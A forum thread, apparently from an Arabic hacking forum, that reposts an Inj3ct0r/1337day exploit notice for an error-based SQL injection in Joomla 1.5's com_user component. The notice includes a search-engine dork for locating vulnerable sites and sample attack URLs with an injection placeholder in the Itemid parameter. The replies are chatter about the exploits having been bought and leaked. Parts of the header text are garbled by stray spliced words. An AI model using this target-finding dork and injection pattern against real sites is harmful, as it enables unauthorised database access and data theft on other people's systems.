1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Caddy-dz member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
####
# Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
# E-mail: [email protected] 
# Category:: webapps
استبدال script home : http://joomla.com
# Dork : inurl:option=com_user
# Security Risk: critical
# Tested on: Back|Track 5 KDE / French
####
# this was written for educational purpose only. use it at your own risk.
# author will be not responsible for any damage caused! user assumes all responsibility 
# intended for authorized web application pentesting only!
 
// Deاستبدال scription :
 
the affected component is /com_user/ in all joomla v1.5
P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version :-)
 
// Exploit :
 
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection)   [replacing id number by character]
 
#  priv8 youtube link, just people who has the link could view : 

shalhop بنات الخيانة و الغدر
  • شكراً: 384
  • تم شكره 189 مرة في 49 مشاركة

مشكور اخي بس ممكن تحكيلنا المصدر لهذه التسريب

مين الموقع الي نزل هذا التسريب والقصة الي صارت في سرقة هذه الثغرات بعد اذنك
ومشكور مرة ثانية

الأعضاء الذين قالوا شكراً لـ shalhop على المشاركة المفيدة:
mehdi racha عضو مميز
  • شكراً: 1767
  • تم شكره 1729 مرة في 331 مشاركة

هههههههه




وجدتهم في أحد المنتديات أجنبية

الأعضاء الذين قالوا شكراً لـ mehdi racha على المشاركة المفيدة:
jago-dz عضو مبدع
  • شكراً: 1024
  • تم شكره 1550 مرة في 402 مشاركة

باين علي الثغرات رايحين يتسربواا

توقيع
Never Trust Number One
3 أعضاء قالوا شكراً لـ jago-dz على المشاركة المفيدة:
UzunDz فريق الحماية للأبد
  • شكراً: 4517
  • تم شكره 5578 مرة في 1384 مشاركة

مساكن خالد واسلام هههه ما نتافعوش بالثغرات
تحيا الجراتوي آخويا

توقيع
./logout
2 أعضاء قالوا شكراً لـ UzunDz على المشاركة المفيدة:
الشبح الدموي عضو مميز
  • شكراً: 296
  • تم شكره 740 مرة في 141 مشاركة

تسلم اخي على الثغرات

توقيع
الشبح الدموي - G-B
g22bhotmail.com
2 أعضاء قالوا شكراً لـ الشبح الدموي على المشاركة المفيدة:
mehdi racha عضو مميز
  • شكراً: 1767
  • تم شكره 1729 مرة في 331 مشاركة

يقال أنا أحد اشترى التغرات كلها تم قام بتسريبها

3 أعضاء قالوا شكراً لـ mehdi racha على المشاركة المفيدة:
DamaneDz x00x-Team
  • شكراً: 2088
  • تم شكره 4253 مرة في 1023 مشاركة

كان شيء واضح من أول يوم

فلم يتطوروا بعد من عدة نواحي

و أيضا هذا سيرجع عليهم بالسلب فبعد ان يتفطن البعض(أصحاب الثغرات أعلاه) من أن ثغراتهم ذهبت في مهب الريح

فسيصبح موقعا غير موثوق فيه و أيضا مهجورا ان صح التعبير

3 أعضاء قالوا شكراً لـ DamaneDz على المشاركة المفيدة:
H4cker-Dz عضو مميز
  • شكراً: 112
  • تم شكره 139 مرة في 68 مشاركة

المشاركة الأصلية كتبت بواسطة mehdi racha اقتباس :
هههههههه




وجدتهم في أحد المنتديات أجنبية

يا اخي مافهمت ليش تطرحوو المواضيع ل3 او اربع ايام في منتدى اخر وبعدين لحتى تطرح الموضوع هنا
يعني لو بدك تطرحووو في منتدى اخر ما في مشكل لكن لا تنتظر كل هذا الوقت لحتى تعيد طرحووو هنا
مشكور على كل حال يا غالي وان شاء الله في المرة الجاية يكون الموضوع اول شئ ينزل هووون وبعدين في باقي المواقع ههههههه تسلم اتصرف مثل ما تبي
مشكووووور

H4cker-Dz عضو مميز
  • شكراً: 112
  • تم شكره 139 مرة في 68 مشاركة

المشاركة الأصلية كتبت بواسطة DamaneDz اقتباس :
كان شيء واضح من أول يوم

فلم يتطوروا بعد من عدة نواحي

و أيضا هذا سيرجع عليهم بالسلب فبعد ان يتفطن البعض(أصحاب الثغرات أعلاه) من أن ثغراتهم ذهبت في مهب الريح

فسيصبح موقعا غير موثوق فيه و أيضا مهجورا ان صح التعبير

الجزائري على العاام راكم علابالكم واش بيه خخخخخخخخخخخ
ربي يصبر اسلام والاخ الاخر

الأعضاء الذين قالوا شكراً لـ H4cker-Dz على المشاركة المفيدة: